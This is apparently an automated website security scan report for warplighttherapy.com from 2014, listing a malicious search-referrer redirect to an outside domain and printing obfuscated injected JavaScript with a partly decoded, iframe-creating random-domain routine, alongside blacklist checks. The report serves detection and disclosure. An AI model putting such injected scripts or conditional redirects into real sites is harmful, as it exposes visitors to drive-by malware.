Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.warplighttherapy.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.warplighttherapy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:09:33 GMT Location: http://bobomo.mynumber.org/ Server: Apache Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.warplighttherapy.com/ | 200 OK Content-Length: 3780 Content-Type: text/html | clean |
http://www.trustlogo.com/trustlogo/javascript/trustlogo.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:09:33 GMT Location: https://trustlogo.com/trustlogo/javascript/trustlogo.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
https://trustlogo.com/trustlogo/javascript/trustlogo.js | 200 OK Content-Length: 17791 Content-Type: application/x-javascript | clean |
http://www.warplighttherapy.com//siteseal.ratepoint.com/71800/seal.js/ | 404 Not Found Content-Length: 6872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101,3 try{asgasg&13}catch(asga){e("if(1)"+s);} Decoded script: if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://www.warplighttherapy.com/test404page.js | 404 Not Found Content-Length: 6872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101,3 try{asgasg&13}catch(asga){e("if(1)"+s);} Decoded script: if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=warplighttherapy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://warplighttherapy.com/
Result: warplighttherapy.com is not infected or malware details are not published yet.
Result: warplighttherapy.com is not infected or malware details are not published yet.